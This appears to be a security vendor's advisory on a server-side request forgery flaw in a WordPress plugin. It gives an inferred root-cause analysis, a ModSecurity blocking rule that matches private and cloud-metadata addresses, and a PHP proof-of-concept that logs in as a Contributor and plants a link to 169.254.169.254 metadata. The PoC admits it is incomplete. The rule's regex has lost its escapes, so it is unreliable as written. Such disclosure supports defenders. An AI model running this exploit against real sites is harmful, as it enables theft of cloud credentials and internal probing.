Atomic Edge analysis of CVE-2026-1313 (metadata-based):
The MimeTypes Link Icons plugin for WordPress versions up to 3.2.20 contains a server-side request forgery (SSRF) vulnerability. This flaw allows authenticated users with Contributor-level permissions or higher to force the application to make arbitrary outbound HTTP requests. The vulnerability is triggered when the plugin’s ‘Show file size’ feature is active, and an attacker injects a crafted link into post content.
Atomic Edge research infers the root cause is a lack of validation on user-supplied URLs before the plugin uses them to make external HTTP requests. The CWE-918 classification confirms this pattern. The vulnerability description states the plugin makes outbound requests to user-controlled URLs. This likely occurs within a function hooked to `the_content` or a similar filter that processes links in posts. The function retrieves a remote file’s size via a method like `wp_remote_head()` or `file_get_contents()` without restricting the target URL scheme or network location.
An attacker exploits this by creating or editing a post with a malicious link. The link’s `href` attribute would point to an internal service or restricted URL, such as `http://169.254.169.254/latest/meta-data/` for AWS metadata. When the post is viewed or previewed, the plugin’s ‘Show file size’ functionality attempts to fetch the linked file’s size, sending the request from the web server. This bypasses normal network boundaries. The attack requires the ‘Contributor’ role, which can create and edit unpublished posts.
Remediation requires implementing strict validation and sanitization on any URL used for outbound requests. The fix should validate the URL scheme, restrict requests to public internet resources, and block access to private IP ranges and localhost. A network-level allowlist for permitted domains or a user-configurable list of allowed hosts would be effective. The plugin must also enforce proper capability checks, though the description confirms the attacker requires Contributor access, which is already a non-trivial privilege.
Successful exploitation enables attackers to probe and interact with internal services unreachable from the external network. This can lead to sensitive information disclosure from cloud metadata services, internal APIs, or file systems. Attackers could also leverage the vulnerable server as a proxy to attack other internal systems, potentially leading to lateral movement. The CVSS vector scores the impact with high Confidentiality, Integrity, and Availability impacts due to the scope change (S:C), reflecting the risk to backend systems.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-1313 (metadata-based)
# This rule blocks attempts to exploit the SSRF via post content submission.
# It targets the WordPress post creation/editing endpoints where malicious links can be injected.
SecRule REQUEST_URI "@rx ^/wp-admin/(post.php|post-new.php|admin-ajax.php)"
"id:20261313,phase:2,deny,status:403,chain,msg:'CVE-2026-1313: MimeTypes Link Icons SSRF via crafted post content',severity:'CRITICAL',tag:'CVE-2026-1313',tag:'WordPress',tag:'Plugin/MimeTypes-Link-Icons',tag:'attack/ssrf'"
SecRule REQUEST_COOKIES:/wordpress_logged_in_[a-f0-9]+/ "@rx .+" "chain"
SecRule ARGS_POST:content|ARGS_GET:content "@rx hrefs*=s*['"]s*(?:http|https)://(?:127.0.0.1|localhost|169.254.169.254|10.|172.(?:1[6-9]|2[0-9]|3[0-1]).|192.168.)"
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,setvar:'tx.cve_2026_1313_score=+1',setvar:'tx.anomaly_score=+%{tx.critical_anomaly_score}'"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1313 - MimeTypes Link Icons <= 3.2.20 - Authenticated (Contributor+) Server-Side Request Forgery via Crafted Links in Post Content
<?php
/*
* This PoC simulates an attacker with Contributor credentials creating a post with a malicious link.
* It assumes the 'Show file size' option is enabled in the plugin settings.
* The target URL is the internal endpoint the attacker wishes to probe via SSRF.
*/
$target_url = 'http://wordpress-site.local'; // CHANGE THIS to the target WordPress site URL
$username = 'contributor_user'; // CHANGE THIS to a valid Contributor username
$password = 'contributor_pass'; // CHANGE THIS to the user's password
$internal_service = 'http://169.254.169.254/latest/meta-data/'; // Example internal target
// Step 1: Authenticate and obtain a valid WordPress nonce for creating a post.
$login_url = $target_url . '/wp-login.php';
$admin_ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $login_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_COOKIEJAR => 'cookies.txt',
CURLOPT_COOKIEFILE => 'cookies.txt',
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]),
CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);
$response = curl_exec($ch);
// Step 2: Fetch a nonce for the 'new-post' action. This often requires loading the post editor.
// We make a request to the admin area to get a fresh nonce. A more robust PoC would parse the HTML.
// For demonstration, we assume a nonce is obtained; a real exploit would extract it.
$editor_url = $target_url . '/wp-admin/post-new.php';
curl_setopt_array($ch, [
CURLOPT_URL => $editor_url,
CURLOPT_POST => false
]);
$editor_html = curl_exec($ch);
// Step 3: Create a draft post containing the malicious link.
// The plugin will process this link when the post is saved or previewed.
$create_post_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
'action' => 'editpost', // Common WordPress AJAX action for saving posts
'post_title' => 'Test Post with SSRF Link',
'content' => '<a href="' . $internal_service . '">Malicious Link</a>', // Crafted link triggers SSRF
'post_status' => 'draft',
'post_type' => 'post',
// Additional required fields like nonce and post ID would be needed in a real scenario.
];
curl_setopt_array($ch, [
CURLOPT_URL => $create_post_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
]);
$ajax_response = curl_exec($ch);
// Step 4: Trigger the SSRF by previewing or viewing the draft.
// The plugin fetches the file size for the link, making the outbound request.
// This step is passive; the server makes the request when the post content is processed.
echo "If the plugin's 'Show file size' is enabled, the server should have made a request to: " . $internal_service . "n";
echo "Check server logs or network egress for the outgoing request.n";
curl_close($ch);
unlink('cookies.txt');
?>
